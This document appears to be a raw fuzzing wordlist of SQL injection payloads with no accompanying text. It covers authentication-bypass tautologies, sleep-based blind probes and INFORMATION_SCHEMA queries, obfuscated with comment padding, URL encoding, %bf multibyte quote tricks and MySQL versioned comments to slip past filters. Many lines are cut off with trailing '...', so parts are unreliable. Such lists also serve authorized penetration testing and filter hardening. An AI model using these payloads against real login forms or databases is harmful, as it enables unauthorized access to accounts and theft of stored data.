%27/**/%6F%72/**/%27%27%27%71%77%65%72%27%27%27%/**/...
%27/**/%6F%72/**/%27%27%3D%27
%27/**/%6F%72/**/%27%31%27%3D%27%31
%27/**/%6F%72/**/%27%34%34%37%39%27%3D%27%34%34%/**/...
%27/**/%6F%72/**/%27%37%36%35%39%27%3D%27%37%36%/**/...
%27/**/%6F%72/**/%27%57%27%3D%27%57%27/**/%23
%27/**/%6F%72/**/%27%61%27%3D%27%61
%27/**/%6F%72/**/%27%78%27%3D%27%78
%27/**/%6F%72/**/%30%3D%30/**/%23
%27/**/%6F%72/**/%31/**/%2D%2D%27
%27/**/%6F%72/**/%31%3D%31/**/%6F%72/**/%27%27%3D%27	
%27/**/%6F%72/**/%31%3D%31/**/%6F%72/**/%27%31%27%/**/...	
%27/**/%6F%72/**/%34%34%37%39/**/%2D%2D%27
%27/**/%6F%72/**/%34%34%37%39%3D%34%34%37%39/**/%/**/...
%27/**/%6F%72/**/%34%34%37%39%3D%34%34%37%39/**/%23
%27/**/or/**/1=1--/**/sp_password
%27%7C%7C%27%36
%28%73%65%6C%65%63%74%28%30%29%66%72%6F%6D%28%/**/...
%31%27/**/%6F%72/**/%27%31%27%3D%27%31	
%31%27%6F%72%27%31	
%39%39%39%39%27%7C%7C%28%73%65%6C%65%63%74/**/%/**/...	
%61%27/**/%6F%72/**/%27%61%27/**/%3D/**/%27%61	
%61%6E%79%74%68%69%6E%67%27/**/%4F%52/**/%27%78%/**/...	
%68%69%27/**/%6F%72/**/%27%61%27%3D%27%61	
%78%27/**/%6F%72/**/%31%3D%31/**/%6F%72/**/%27%78%/**/...	
%79%27/**/%6F%72/**/%31%3D%31/**/%6F%72/**/%27%79%/**/...	
%bf%27/**/or/**/'''qwer'''='''qwer''	
%bf%27/**/or/**/''='	
%bf%27/**/or/**/1/**/--'	
%bf%27/**/or/**/1=1/**/or/**/''='	
%bf%27/**/or/**/4479/**/--'	
%bf%27/**/or/**/4479=4479/**/or/**/''='	
%bf%27/**/or/**/''='	
%bf%27/**/or/**/'x'='x	
%bf%27OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**//**/...	
%bf%27||'6	
'/**//**//**//**/or/**//**//**//**/'1'='1	
'/**//**//**//**/or/**//**//**//**/1/**/--'	
'/**//**//**//**/or/**//**//**/'1'='1	
'/**//**//**//**/or/**//**//**/1/**/--'	
'/**//**//**//**/or/**//**/1=1/**//**//**//**/or/**//**/'1'='1	
'/**//**//**/or/**//**//**//**/'7659'='7659	
'/**//**//**/or/**//**//**//**/1=1/**//**//**/or/**//**//**//**/''='	
'/**//**/or/**//**//**//**/'''qwer'''='''qwer''	
'/**//**/or/**//**//**//**/''='	
'/**//**/or/**//**//**//**/'4479'='4479	
'/**//**/or/**//**//**//**/'a'='a	
'/**//**/or/**//**//**/''='	
'/**//**/or/**//**//**/1=1/**//**/or/**//**//**/''='	
'/**//**/or/**//**//**/4479=4479/**//**/or/**//**//**/''='	
'/**//**/or/**//**/'1'='1	
'/**//**/or/**//**/1=1/**//**/or/**//**/''='	
'/**//**/or/**//**/4479/**/--'	
'/**//*!00000or/**/1/**/*/--'	
'/**//*!00000or/**/4479/**/*/--'	
'/**//*!30163or/**/1/**/*/--'	
'/**//*!30458or/**/4479/**/*/--'	
'/**//*!30897or/**/1/**/*/--'	
'/**/OR/**//**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/v/**/...	
'/**/Or/**/''='	
'/**/Or/**/'1'='1	
'/**/Or/**/'a'='a	
'/**/Or/**/1/**/--'	
'/**/Or/**/4479/**/--'	
'/**/oR/**/'''qwer'''='''qwer''	
'/**/oR/**/'1'='1	
'/**/oR/**/'4479'='4479	
'/**/oR/**/'7659'='7659	
'/**/oR/**/1/**/--'	
'/**/oR/**/1=1/**/oR/**/''='	
'/**/oR/**/1=1/**/oR/**/'1'='1	
'/**/oR/**/4479=4479/**/oR/**/''='	
'/**/or/**/''/**/LIKE/**/'	
'/**/or/**/'''qwer'''/**/LIKE/**/'''qwer''	
'/**/or/**/'''qwer'''='''qwer''	
'/**/or/**/'''qwer'''='''qwer''	
'/**/or/**/'''qwer'''='''qwer'''--/**/and/**/'0having'='0h/**/...	
'/**/or/**/''='	
'/**/or/**/''='	
'/**/or/**/''='	
'/**/or/**/'1'/**/LIKE/**/'1	
'/**/or/**/'1'='1	
'/**/or/**/'1'='1	
'/**/or/**/'1'='1	
'/**/or/**/'1'='1	
'/**/or/**/'1'='1'--/**/and/**/'0having'='0having'	
'/**/or/**/'4479'/**/LIKE/**/'4479	
'/**/or/**/'4479'='4479	
'/**/or/**/'4479'='4479	
'/**/or/**/'4479'='4479'--/**/and/**/'0having'='0having'	
'/**/or/**/'7659'/**/LIKE/**/'7659	
'/**/or/**/'7659'='7659	
'/**/or/**/'7659'='7659	
'/**/or/**/'W'='W'/**/--/**/and/**/'0having'='0having'	
'/**/or/**/'a'/**/LIKE/**/'a	
'/**/or/**/'a'='a	
'/**/or/**/'a'='a	
'/**/or/**/'something'/**/=/**/'some'+'thing'--/**/sp_password	
'/**/or/**/'something'/**/like/**/'some%'--/**/sp_password	
'/**/or/**/'text'/**/=/**/n'text'--/**/sp_password	
'/**/or/**/'text'/**/>/**/'t'--/**/sp_password	
'/**/or/**/'unusual'/**/=/**/'unusual'--/**/sp_password	
'/**/or/**/'whatever'/**/in/**/('whatever')--/**/sp_password	
'/**/or/**/0=0/**/--/**/and/**/'0having'='0having'	
'/**/or/**/1/**/--'	
'/**/or/**/1/**/--'	
'/**/or/**/1/**/--'	
'/**/or/**/1/**/--'%00	
'/**/or/**/1/**/--'--/**/sp_password	
'/**/or/**/1/**/LIKE/**/1/**/or/**/''/**/LIKE/**/'	
'/**/or/**/1/**/LIKE/**/1/**/or/**/'1'/**/LIKE/**/'1	
'/**/or/**/10/**/>/**/9--/**/sp_password	
'/**/or/**/1=1/**/--/**/and/**/'0having'='0having'	
'/**/or/**/1=1/**/or/**/''='	
'/**/or/**/1=1/**/or/**/''='	
'/**/or/**/1=1/**/or/**/''='	
'/**/or/**/1=1/**/or/**/''='	
'/**/or/**/1=1/**/or/**/''='%00	
'/**/or/**/1=1/**/or/**/''='--/**/sp_password	
'/**/or/**/1=1/**/or/**/'1'='1	
'/**/or/**/1=1/**/or/**/'1'='1	
'/**/or/**/1=1/**/or/**/'1'='1%00	
'/**/or/**/1=1/**/or/**/'1'='1--/**/sp_password	
'/**/or/**/1=1--/**/	
'/**/or/**/1=1--/**/and/**/'0having'='0having'	
'/**/or/**/1=1--/**/sp_password	
'/**/or/**/2/**/>/**/1--/**/sp_password	
'/**/or/**/2/**/between/**/1/**/and/**/3--/**/sp_password	
'/**/or/**/2/**/between/**/1/**/and/**/5--/**/sp_password	
'/**/or/**/2/**/between/**/2/**/and/**/5--/**/sp_password	
'/**/or/**/3/**/>/**/1--/**/sp_password	
'/**/or/**/3=3/**/--/**/and/**/'0having'='0having'	
'/**/or/**/3=3--/**/sp_password	
'/**/or/**/4/**/>/**/1--/**/sp_password	
'/**/or/**/4479/**/--'	
'/**/or/**/4479/**/--'	
'/**/or/**/4479/**/--'%00	
'/**/or/**/4479/**/--'--/**/sp_password	
'/**/or/**/4479/**/LIKE/**/4479/**/or/**/''/**/LIKE/**/'	
'/**/or/**/4479=4479/**/--/**/and/**/'0having'='0having'	
'/**/or/**/4479=4479/**/or/**/''='	
'/**/or/**/4479=4479/**/or/**/''='	
'/**/or/**/4479=4479/**/or/**/''='%00	
'/**/or/**/4479=4479/**/or/**/''='--/**/sp_password	
'/**/or/**/4479=4479--/**/	
'/**/or/**/4479=4479--/**/and/**/'0having'='0having'	
'/**/or/**/4479=4479--/**/sp_password	
'%09or%091=1%0Cor%0D''='	
'%09or%0A'7659'='7659	
'%09or%0A1=1%0Dor%0C''='	
'%09or%0D'4479'='4479	
'%0Aor%09'''qwer'''='''qwer''	
'%0Aor%09'7659'='7659	
'%0Aor%094479=4479%09or%0B''='	
'%0Aor%0B'1'='1	
'%0Aor%0C1=1%0Aor%0A''='	
'%0Aor%0D'4479'='4479	
'%0Aor%0D'a'='a	
'%0Aor%0D4479=4479%0Cor%09''='	
'%0Bor%091=1%0Bor%0A''='	
'%0Bor%0A''='	
'%0Bor%0A1%0C--'	
'%0Bor%0B'7659'='7659	
'%0Bor%0C'1'='1	
'%0Cor%09'1'='1	
'%0Cor%0A''='	
'%0Cor%0A1%0B--'	
'%0Cor%0B4479%09--'	
'%0Cor%0D'''qwer'''='''qwer''	
'%0Cor%0D'1'='1	
'%0Dor%0A1%0C--'	
'%0Dor%0A1=1%09or%0D'1'='1	
'%0Dor%0A1=1%0Cor%0D''='	
'%0Dor%0B''='	
'%0Dor%0C1%0C--'	
'%0Dor%0D''='	
'%0Dor%0D'1'='1	
'%0Dor%0D'a'='a	
'%0Dor%0D1=1%09or%09''='	
'%0Dor%0D1=1%0Cor%0A'1'='1	
'%0Dor%0D4479%0D--'	
'/**/Or/**/''='	
'/**/Or/**/'x'='x	
'/**/oR/**/'x'='x	
'/**/or/**/''/**/LIKE/**/'	
'/**/or/**/''='	
'/**/or/**/''='	
'/**/or/**/''='	
'/**/or/**/'x'/**/LIKE/**/'x	
'/**/or/**/'x'='x	
'/**/or/**/'x'='x	
'/**/or/**/'x'='x	
'/**/or/**/1=1--/**/sp_password	
'%23%0Aor%23%0A'''qwer'''='''qwer''	
'%23%0Aor%23%0A''='	
'%23%0Aor%23%0A'1'='1	
'%23%0Aor%23%0A'4479'='4479	
'%23%0Aor%23%0A'7659'='7659	
'%23%0Aor%23%0A'a'='a	
'%23%0Aor%23%0A1%23%0A--'	
'%23%0Aor%23%0A1=1%23%0Aor%23%0A''='	
'%23%0Aor%23%0A1=1%23%0Aor%23%0A'1'='1	
'%23%0Aor%23%0A4479%23%0A--'	
'%23%0Aor%23%0A4479=4479%23%0Aor%23%0A''='	
'%23CeijlWZKZpl%0Aor%23FQvUDCjTA%0A%23FcROVSge/**/...	
'%23CnggvFRvbgbO%0Aor%23qDimHe%0A%23rKMdpLM%0A/**/...	
'%23EokHeadawk%0Aor%23sgcjKcXi%0A''='	
'%23FCBqoaDJFE%0Aor%23tWUdsl%0A%23isTdcoL%0A44/**/...	
'%23GkRyjZml%0Aor%23WgFdYdaHK%0A1=1%23VuzjLtha/**/...	
'%23HAJLhKqUhCAQ%0Aor%23wErdeVc%0A1=1%23ljIEoe/**/...	
'%23JwMQQOXTXQNl%0Aor%23XTkoQdNRxq%0A'''qwer''/**/...	
'%23MFQrhqkomteO%0Aor%23lpMdzR%0A1=1%23bNlCCex/**/...	
'%23PSByLBWIeYv%0Aor%23lvINayiME%0A%23BCqMTwmr/**/...	
'%23QzFfMu%0Aor%23UfLHQJ%0A1%23ojQVtz%0A--'	
'%23RVdHFCZV%0Aor%23gwjbhhquzn%0A''='	
'%23RgZgAWiml%0Aor%23rPyHdyftpJkv%0A%23wSKwGuE/**/...	
'%23UGzgPZpQR%0Aor%23UqfPheWVBjAf%0A%23uhjDUfq/**/...	
'%23VtalolGHWXZ%0Aor%23HMTuWEWuXmJ%0A'1'='1	
'%23aQumag%0Aor%23MJiygMxVpz%0A'4479'='4479	
'%23aUKuXSC%0Aor%23pKUhYuipXGh%0A%23lTxhDDu%0A/**/...	
'%23bFXBwKpFVQ%0Aor%23FxEohsOUES%0A%23xqNtqrFP/**/...	
'%23dWAHeE%0Aor%23JbPsPJc%0A%23snTQKO%0A'4479'/**/...	
'%23drpXDnCR%0Aor%23EzKDVZHRj%0A1=1%23zNpavNzZ/**/...	
'%23exshHOJlfHgt%0Aor%23qptpKjUWPocp%0A4479=44/**/...	
'%23ezQtveYjdT%0Aor%23tjreaShkwRR%0A%23ltvylzD/**/...	
'%23folnppRc%0Aor%23HotPZGgkPeUG%0A'1'='1	
'%23fwZhZqHhE%0Aor%23RZFMZpU%0A%23DXqvGbZag%0A/**/...	
'%23gKDWNKRceUKl%0Aor%23aZZyIVeEyvq%0A'7659'='/**/...	
'%23gjZIpswf%0Aor%23vhSeGXfNUszw%0A4479%23QKam/**/...	
'%23kNkdUky%0Aor%23nzpDeyN%0A%23dqMQdO%0A'7659/**/...	
'%23mCQviOgQju%0Aor%23ogcmwNmxmJ%0A%23fDGHeX%0/**/...	
'%23nXYHXdtomb%0Aor%23ObQyPJBIx%0A1%23gOtgDGcF/**/...	
'%23omKfTlwhQJ%0Aor%23yjWSpNAeEPh%0A'1'='1	
'%23uKZYjVZspNv%0Aor%23XMoqJDqgGvNt%0A%23hUdSg/**/...	
'%23ukTFvekUX%0Aor%23bGWvbxOJrYk%0A%23NbfQmDCN/**/...	
'%23vBFEAkqZrvQ%0Aor%23GPIUrC%0A'a'='a	
'%23vVIsdE%0Aor%23mxuIXYp%0A%23CDWSLm%0A'''qwe/**/...	
'%23zQzjkGj%0Aor%23eMRvmiBU%0A%23GMtkjCrKwkk%0/**/...	
'--%0Aor--%0A'''qwer'''='''qwer''	
'--%0Aor--%0A''='	
'--%0Aor--%0A'1'='1	
'--%0Aor--%0A'4479'='4479	
'--%0Aor--%0A'7659'='7659	
'--%0Aor--%0A'a'='a	
'--%0Aor--%0A1--%0A--'	
'--%0Aor--%0A1=1--%0Aor--%0A''='	
'--%0Aor--%0A1=1--%0Aor--%0A'1'='1	
'--%0Aor--%0A4479--%0A--'	
'--%0Aor--%0A4479=4479--%0Aor--%0A''='	
'/*!OR*/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/...	
'/*!or*/'''qwer'''='''qwer''	
'/*!or*/''='	
'/*!or*/'1'='1	
'/*!or*/'4479'='4479	
'/*!or*/'7659'='7659	
'/*!or*/'a'='a	
'/*!or*/1/**/--'	
'/*!or*/1=1/*!or*/''='	
'/*!or*/1=1/*!or*/'1'='1	
'/*!or*/4479/**/--'	
'/*!or*/4479=4479/*!or*/''='	
'/**/or/**/'''qwer'''='''qwer''	
'/**/or/**/''='	
'/**/or/**/'1'='1	
'/**/or/**/'4479'='4479	
'/**/or/**/'7659'='7659	
'/**/or/**/'a'='a	
'/**/or/**/1/**/--'	
'/**/or/**/1/**/=/**/1--/**/sp_password	
'/**/or/**/1=1/**/or/**/''='	
'/**/or/**/1=1/**/or/**/'1'='1	
'/**/or/**/4479/**/--'	
'/**/or/**/4479/**/=/**/4479--/**/sp_password	
'/**/or/**/4479=4479/**/or/**/''='	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'OR/**/''LIKE'	Allows/**/authentication/**/without/**/a/**/va/**/...	
'OR/**/1=1--/**/and/**/'0having'='0having'	
'OR%09''/**/LIKE/**/'	Allows/**/authentication/**/without/**//**/...	
'OR%09''%0D=%0D'	Allows/**/authentication/**/without/**/...	
'OR%0A''%0C=%0D'	Allows/**/authentication/**/without/**/...	
'OR/**/''/**/=/**/'	Allows/**/authentication/**/with/**/...	
'oR/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'or/**/''/**/=/**/'	Allows/**/authentication/**/without/**/a/**/val/**/...	
'||'6	
'||'6	
'||'6%00	
'||'6--/**/sp_password	
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))--/**/...	
(/**//**//**/select(0)/**//**/from(/**//**//**/select(sleep(0)))v)/*'+/**/...	
(/*!select*/(0)/*!from*/(/*!select*/(sleep(0))/**/...	
(SeLEcT(0)fRom(SeLEcT(sleep(0)))v)/*'+(SeLEcT(/**/...	
(select%23kLFcqn%0A(0)from%23xiGjKj%0A(select%/**/...	
(select(0)from(select(sleep(0)))v)/*%bf%27+(se/**/...	
(select(0)from(select(sleep(0)))v)/*'+(select(/**/...	
(select(0)from(select(sleep(0)))v)/*'+(select(/**/...	
(select(0)from(select(sleep(0)))v)/*'+(select(/**/...	
(select(0)from(select(sleep(0)))v)/*'+(select(/**/...	
1%bf%27or'1	
1'/**//**/or/**//**/'1'='1	
1'/**/oR/**/'1'='1	
1'/**/or/**//**/'1	
1'/**/or/**/'1'/**/LIKE/**/'1	
1'/**/or/**/'1'='1	
1'/**/or/**/'1'='1	
1'%09or%0D'1'='1	
1'%0Cor%0A'1'='1	
1'%23%0Aor%23%0A'1'='1	
1'%23DXqtUS%0Aor%23FuzBFaQFq%0A'1'='1	
1'%23pQqnTP%0Aor%23foYqkcCvSf%0A%23LMBiyNoLz%0/**/...	
1'--%0Aor--%0A'1'='1	
1'/*!or*/'1	
1'/*!or*/'1'='1	
1'/**/or/**/'1'='1	
1'oR'1	
1'or%23mEKUeSlTl%0A'1	
1'or'1	
1'or'1	
1'or'1%00	
1'or'1--/**/sp_password	
9999%bf%27||(select/**/count(*)/**/from/**/INFORMATION_/**/...	
9999'||(/**//**/select/**//**//**//**//**//**/count(*)/**//**//**//**/from/**//**/INFORM/**/...	
9999'||(/*!select*/count(*)/*!from*/INFORMATIO/**/...	
9999'||(sElect/**/COUNt(*)/**/FrOM/**/INFORMATION_SCHEM/**/...	
9999'||(select/**/count(*)/**/from/**/INFORMATION_SCHEM/**/...	
9999'||(select/**/count(*)/**/from/**/INFORMATION_SCHEM/**/...	
9999'||(select/**/count(*)/**/from/**/INFORMATION_SCHEM/**/...	
9999'||(select/**/count(*)/**/from/**/INFORMATION_SCHEM/**/...	
9999'||(select%0Acount(*)%0Dfrom%09INFORMATION/**/...	
9999'||(select%0Dcount(*)%0Bfrom%0AINFORMATION/**/...	
9999'||(select%23%0Acount(*)%23%0Afrom%23%0AIN/**/...	
9999'||(select%23RbAudrzISmG%0A%23RMfgRR%0Acou/**/...	
9999'||(select%23SMmtYMTvoz%0Acount(*)%23kcmsQ/**/...	
9999'||(select--%0Acount(*)--%0Afrom--%0AINFOR/**/...	
9999'||(select/**/count(*)/**/from/**/INFORMAT/**/...	
<username>'/**/OR/**/1=1--/**/and/**/'0having'='0having'	
a'/**//**//**/or/**//**//**/'a'/**/=/**/'a	
a'/**//**/or/**//**//**/'a'/**/=/**/'a	
a'/**/Or/**/'a'/**/=/**/'a	
a'/**/oR/**/'a'/**/=/**/'a	
a'/**/or/**/'a'/**/=/**/'a	
a'/**/or/**/'a'/**/=/**/'a	
a'/**/or/**/'a'/**/=/**/'a	
a'/**/or/**/'a'/**/LIKE/**/'a	
a'/**/or/**/'a'LIKE'a	
a'/**/or/**/1=1--/**/and/**/'0having'='0having'	
a'/**/or/**/3=3--/**/and/**/'0having'='0having'	
a'%0Bor%0D'a'%0D=%0A'a	
a'%0Cor%09'a'%0C=%0B'a	
a'%0Cor%0D'a'%09=%09'a	
a'%0Dor%0C'a'%0D=%0A'a	
a'%23%0Aor%23%0A'a'%23%0A=%23%0A'a	
a'%23NAxcEOSyM%0Aor%23kgHJoednGk%0A%23vnTqaC%0/**/...	
a'%23NHaEWidLGfk%0Aor%23epZEearOBYHx%0A%23zLBc/**/...	
a'%23UEyvdjKoPt%0Aor%23IKxtfvI%0A'a'%23wcXKffX/**/...	
a'%23dPPtPV%0Aor%23NaAChWUKomE%0A'a'%23uAgBzIP/**/...	
a'--%0Aor--%0A'a'--%0A=--%0A'a	
a'/*!or*/'a'/**/=/**/'a	
a'/**/or/**/'a'/**/=/**/'a	
anything'/**//**/OR/**//**//**//**/'x'='x	
anything'/**//**/OR/**//**//**/'x'='x	
anything'/**/OR/**/'x'/**/LIKE/**/'x	
anything'/**/OR/**/'x'='x	
anything'/**/OR/**/'x'='x	
anything'/**/OR/**/'x'='x	
anything'/**/OR%09'x'/**/LIKE/**/'x	
anything'/**/Or/**/'x'='x	
anything'/**/oR/**/'x'='x	
anything'/**/or/**/'x'='x	
anything'%09OR%0C'x'='x	
anything'%09OR%0D'x'='x	
anything'%0COR%0C'x'='x	
anything'%0DOR%09'x'='x	
anything'%23%0AOR%23%0A'x'='x	
anything'%23CaTWEmoJdVI%0AOR%23fJTpaQdn%0A'x'='x	
anything'%23VUpuaheJWeP%0AOR%23bZxqfVoJZe%0A%2/**/...	
anything'%23jMqxoQxis%0AOR%23OtNPwUTOki%0A'x'='x	
anything'%23kPNsFLYb%0AOR%23PGRExuZC%0A%23uREq/**/...	
anything'--%0AOR--%0A'x'='x	
anything'/*!OR*/'x'='x	
anything'/**/OR/**/'x'='x	
hi'/**//**//**//**/or/**//**//**//**/'a'='a	
hi'/**//**//**//**/or/**//**//**/'a'='a	
hi'/**/Or/**/'a'='a	
hi'/**/oR/**/'a'='a	
hi'/**/or/**/'a'/**/LIKE/**/'a	
hi'/**/or/**/'a'='a	
hi'/**/or/**/'a'='a	
hi'/**/or/**/'a'='a	
hi'/**/or/**/1=1/**/--/**/and/**/'0having'='0having'	
hi'%09or%0C'a'='a	
hi'%0Aor%0C'a'='a	
hi'%0Cor%0B'a'='a	
hi'%0Cor%0D'a'='a	
hi'%23%0Aor%23%0A'a'='a	
hi'%23BreKUkrNmAR%0Aor%23tEbXFtUrikzF%0A'a'='a	
hi'%23QQYzAdgZePVs%0Aor%23EokFFqumnM%0A%23Jzkv/**/...	
hi'%23RgfReFQOwS%0Aor%23CdaAFT%0A%23zSFnyJe%0A/**/...	
hi'%23UTNnZGQwKE%0Aor%23cyaKNTRukqn%0A'a'='a	
hi'--%0Aor--%0A'a'='a	
hi'/*!or*/'a'='a	
hi'/**/or/**/'a'='a	
root'/**/or/**/'1'='1	
root'%09or%09'1'='1	
root'/**/or/**/'1'='1	
root'/**/or/**/'1'='1	
root'or'1'='1	
root'or'1'='1	
x'/**//**//**/or/**//**/1=1/**//**//**/or/**//**/'x'='y	
x'/**//**/or/**//**//**//**/1=1/**//**/or/**//**//**//**/'x'='y	
x'/**//**/or/**//**//**/1=1/**//**/or/**//**//**/'x'='y	
x'/**/Or/**/1=1/**/Or/**/'x'='y	
x'/**/oR/**/1=1/**/oR/**/'x'='y	
x'/**/or/**/1/**/LIKE/**/1/**/or/**/'x'/**/LIKE/**/'y	
x'/**/or/**/1=1/**/or/**/'x'='y	
x'/**/or/**/1=1/**/or/**/'x'='y	
x'/**/or/**/1=1/**/or/**/'x'='y	
x'/**/or/**/1=1/**/or/**/'x'='y	
x'/**/or/**/1=1/**/or/**/'x'='y%00	
x'/**/or/**/1=1/**/or/**/'x'='y--/**/sp_password	
x'%09or%0A1=1%0Aor%0A'x'='y	
x'%09or%0D1=1%0Bor%0B'x'='y	
x'%0Aor%0A1=1%0Cor%0C'x'='y	
x'%0Cor%0C1=1%0Bor%0A'x'='y	
x'%0Dor%0D1=1%0Dor%0A'x'='y	
x'%0Dor%0D1=1%0Dor%0C'x'='y	
x'%23%0Aor%23%0A1=1%23%0Aor%23%0A'x'='y	
x'%23GRfyiRHwc%0Aor%23nUtVsmfxXY%0A%23CmnltNLP/**/...	
x'%23NTdPblsvni%0Aor%23uSlVqSREd%0A1=1%23wdjPW/**/...	
x'%23SZmrvPa%0Aor%23qEdZttZq%0A%23tOOBpSH%0A1=/**/...	
x'%23TnLpCcIwgrzG%0Aor%23YsESsvFCTx%0A%23RiqZK/**/...	
x'%23bMKlqBbU%0Aor%23pyWatwRyQJ%0A1=1%23WMxncl/**/...	
x'%23lJydgmHSD%0Aor%23ApvOrXdYftw%0A1=1%23yfBe/**/...	
x'--%0Aor--%0A1=1--%0Aor--%0A'x'='y	
x'/*!or*/1=1/*!or*/'x'='y	
x'/**/or/**/1=1/**/or/**/'x'='y	
y/**/'/**/or/**/10/**/>/**/9--/**/sp_password	
y/**/'/**/or/**/2/**/>/**/1--/**/sp_password	
y/**/'/**/or/**/2/**/between/**/1/**/and/**/3--/**/sp_password	
y/**/'/**/or/**/2/**/between/**/1/**/and/**/5--/**/sp_password	
y/**/'/**/or/**/2/**/between/**/2/**/and/**/5--/**/sp_password	
y/**/'/**/or/**/3/**/>/**/1--/**/sp_password	
y/**/'/**/or/**/3=3/**/--/**/and/**/'0having'='0having'	
y/**/'/**/or/**/3=3--/**/sp_password	
y/**/'/**/or/**/4/**/>/**/1--/**/sp_password	
y'/**//**//**//**/or/**//**/1=1/**//**//**//**/or/**//**/'y'='y	
y'/**/Or/**/1=1/**/Or/**/'y'='y	
y'/**/or/**/1/**/LIKE/**/1/**/or/**/'y'/**/LIKE/**/'y	
y'/**/or/**/1=1/**/or/**/'y'='y	
y'/**/or/**/1=1/**/or/**/'y'='y	
y'/**/or/**/1=1/**/or/**/'y'='y%00	
y'/**/or/**/1=1/**/or/**/'y'='y--/**/sp_password	
y'%09or%091=1%0Aor%0C'y'='y	
y'%0Cor%0D1=1%0Cor%0D'y'='y	
y'%23%0Aor%23%0A1=1%23%0Aor%23%0A'y'='y	
y'%23npXaCweMyi%0Aor%23OChCzitUi%0A%23SGhGErYR/**/...	
y'%23tZQEnxrM%0Aor%23QmggCTadK%0A1=1%23bbmfcEZ/**/...	
y'--%0Aor--%0A1=1--%0Aor--%0A'y'='y	
y'/*!or*/1=1/*!or*/'y'='y	
y'/**/or/**/1=1/**/or/**/'y'='y	